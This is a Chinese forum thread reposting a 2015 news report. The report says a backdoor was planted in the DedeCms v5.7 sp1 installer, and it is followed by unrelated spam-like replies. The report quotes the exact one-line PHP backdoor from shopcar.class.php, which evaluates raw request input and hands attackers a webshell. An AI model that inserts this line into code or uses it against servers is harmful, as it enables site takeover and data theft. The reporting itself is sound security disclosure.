得知互动
标题:
织梦CMS系统被曝植入后门 70万网站资料或泄露
[打印本页]
作者:
kjeittccdf
时间:
2015-3-30 15:29
标题:
织梦CMS系统被曝植入后门 70万网站资料或泄露
网易科技讯 3月22日消息,瑞星与360今日对外发布警示,称国内知名的PHP开源网站管理系统织梦CMS(DedeCms)v5.7 sp1版本安装包被发现植入后门,黑客可通过此后门直接获得网站的控制权限,获取存储在服务器上的文件和数据库。
据织梦CMS官方数据显示,目前约有70万网站使用该系统搭建,涉及企业、政府机关、媒体机构、行业及个人网站等。
安全界人士分析发现,此次织梦CMS曝出的后门恶意代码存在于购物车类文件(shopcar.class.php)中,此类文件被植入一句后门代码“@eval(file_get_contents('php://input'));”。凡是调用该购物车类的文件均会触发后门,黑客只需要构造简单的数据包提交到服务器,就能够获取到该网站的WebShell,通过对服务器进一步渗透攻击,进而获取服务器的最高权限,直接访问服务器上的文件、数据库等信息。(易科)
(, 下载次数: 6)
上传
点击文件名下载附件
织梦CMS中被植入的后门代码
延伸阅读:
Dedecms被曝疑似植入后门 可成功控制网站
作者:
wwzcdenleclv
时间:
2016-1-18 18:20
今天统计好像出了问题
作者:
seazvyt
时间:
2016-1-18 18:20
来电来函..欢迎洽购...
作者:
seazvyt
时间:
2016-1-18 18:21
为了不让帖子沉得太快!!!为了人人知道这个~!! 我不是原创~!!但是我要把他发扬广大~!!!
作者:
mwxny
时间:
2016-1-18 18:22
哈哈~` 你好有意思哦~
作者:
wwzcdenleclv
时间:
2016-1-18 18:22
哎 天理何在啊??
作者:
wwdu926a
时间:
2016-1-25 18:04
k了我一个月的站,刚才site的时候
作者:
wwzcdenleclv
时间:
2016-1-25 18:04
这个站一周前刚刚有了点起色
作者:
wwdu926a
时间:
2016-1-25 18:04
有现实中的偶在这...不佩服.............佩服电影里的....
作者:
buingeEvineus
时间:
2016-1-25 18:04
真是天底下好事多多
作者:
tohme
时间:
2016-1-25 18:04
我想骂我自己
作者:
Acropozelan
时间:
2017-4-11 15:06
晚安 别让小嫁再郁闷了 -
作者:
effoggikeftor
时间:
2017-4-11 15:11
晕 在我帖里面找偶像啊??
作者:
seazvyt
时间:
2017-4-11 15:12
看,刚说你眼神不好,你还就来劲了不是.
作者:
Mqokjdvq
时间:
2017-4-11 15:12
我不知道他说的是什么啊~~
作者:
wwzcdenleclv
时间:
2017-4-11 15:12
哥们,给我做个链接吧
欢迎光临 得知互动 (https://bbs.dezhifl.com/)
Powered by Discuz! X3.4